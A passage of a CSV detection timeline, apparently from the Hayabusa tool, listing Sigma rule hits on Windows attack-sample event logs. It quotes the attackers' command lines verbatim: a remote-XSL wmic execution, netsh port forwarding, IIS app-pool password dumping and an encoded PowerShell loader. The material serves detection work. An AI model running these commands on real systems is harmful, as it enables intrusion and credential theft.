Creation,"Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" SCODEF:1600 CREDAT:275470 /prefetch:2",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_driveby_cve-2018-15982_sysmon_1_10.evtx +2019-05-24 01:49:05.736 +09:00,IEWIN7,1,informational,Process Creation,"Command: wmic process list /format:""https://a.uguu.se/x50IGVBRfr55_test.xsl"" : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-24 01:49:05.736 +09:00,IEWIN7,1,medium,XSL Script Processing,,rules/sigma/process_creation/win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-24 01:49:05.736 +09:00,IEWIN7,1,medium,SquiblyTwo,,rules/sigma/process_creation/win_bypass_squiblytwo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-24 01:49:07.731 +09:00,IEWIN7,11,high,Windows Shell File Write to Suspicious Folder,,rules/sigma/file_event/file_event_win_shell_write_susp_directory.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-24 01:49:08.422 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: wmic process list /format:""https://a.uguu.se/x50IGVBRfr55_test.xsl""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-24 01:50:44.582 +09:00,IEWIN7,1,informational,Process Creation,Command: wmiadap.exe /F /T /R : Path: C:\Windows\System32\wbem\WMIADAP.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-24 02:26:08.716 +09:00,IEWIN7,1,informational,Process Creation,"Command: msxsl.exe c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat : Path: \\vboxsrv\HTools\msxsl.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx +2019-05-24 02:26:08.716 +09:00,IEWIN7,1,medium,XSL Script Processing,,rules/sigma/process_creation/win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx +2019-05-24 02:26:09.437 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: msxsl.exe c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx +2019-05-24 02:45:34.538 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx +2019-05-24 02:46:04.671 +09:00,IEWIN7,1,informational,Process Creation,"Command: netsh I p a v l=8001 listena=1.2.3.4 connectp=3389 c=1.2.3.5 : Path: C:\Windows\System32\netsh.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx +2019-05-24 02:46:04.671 +09:00,IEWIN7,1,medium,Netsh Port Forwarding,,rules/sigma/process_creation/win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx +2019-05-24 02:46:04.671 +09:00,IEWIN7,1,high,Netsh RDP Port Forwarding,,rules/sigma/process_creation/win_netsh_port_fwd_3389.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense 
Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx +2019-05-24 10:33:53.112 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""c:\windows\system32\cmd.exe"" /c net user : Path: C:\Windows\System32\cmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipm719e5ea8-b97b-40d0-96b6-44cca91790fe -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 10:33:53.112 +09:00,IEWIN7,1,high,Shells Spawned by Web Servers,,rules/sigma/process_creation/win_webshell_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 10:33:53.122 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 10:33:53.182 +09:00,IEWIN7,1,informational,Process Creation,"Command: net user : Path: C:\Windows\System32\net.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""c:\windows\system32\cmd.exe"" /c net user",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 10:33:53.182 +09:00,IEWIN7,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 10:33:53.182 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 10:33:53.192 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\net1 user : Path: C:\Windows\System32\net1.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: net user,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 10:33:53.192 +09:00,IEWIN7,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 10:33:53.192 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-26 13:01:42.385 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Desktop\info.rar\jjs.exe"" : Path: C:\Users\IEUser\Desktop\info.rar\jjs.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 13:01:42.966 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Desktop\info.rar\jjs.exe"" : Path: C:\Users\IEUser\Desktop\info.rar\jjs.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 13:01:43.567 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\svchost.exe : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
""C:\Users\IEUser\Desktop\info.rar\jjs.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 13:01:43.567 +09:00,IEWIN7,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 13:01:43.567 +09:00,IEWIN7,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 13:01:43.567 +09:00,IEWIN7,1,critical,Suspect Svchost Activity,,rules/sigma/process_creation/win_susp_svchost_no_cli.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-27 00:47:56.667 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\System32\notepad.exe : Path: C:\Windows\System32\notepad.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipmb9da32d5-aa43-42fc-aeea-0cc226e10973 -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:47:56.667 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:47:56.727 
+09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:47:57.628 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:47:58.830 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:47:58.830 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:47:59.871 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:47:59.871 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:48:00.732 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:48:00.732 +09:00,IEWIN7,3,high,Notepad Making 
Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:48:00.752 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\notepad.exe"" : Path: C:\Windows\System32\notepad.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\System32\notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:48:01.864 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 10:28:42.711 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipm7486e07c-453c-4f8e-85c6-8c8e3be98cd5 -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:28:42.711 +09:00,IEWIN7,1,high,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:28:42.711 +09:00,IEWIN7,1,low,Non Interactive 
PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:28:42.711 +09:00,IEWIN7,1,high,Shells Spawned by Web Servers,,rules/sigma/process_creation/win_webshell_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:28:42.711 +09:00,IEWIN7,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.000 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\InetSRV\appcmd.exe"" list vdir /text:physicalpath : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.110 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppools /text:name : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.190 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""ERROR ( 
message:Configuration error "" /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.270 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""ERROR ( message:Configuration error "" /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.350 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.581 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 
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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.661 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Filename: redirection.config"" /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.731 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Filename: redirection.config"" /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.811 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential 
Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.891 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.971 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Line Number: 0"" /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.041 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Line Number: 0"" /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 
JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYA
OAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.121 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.202 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: 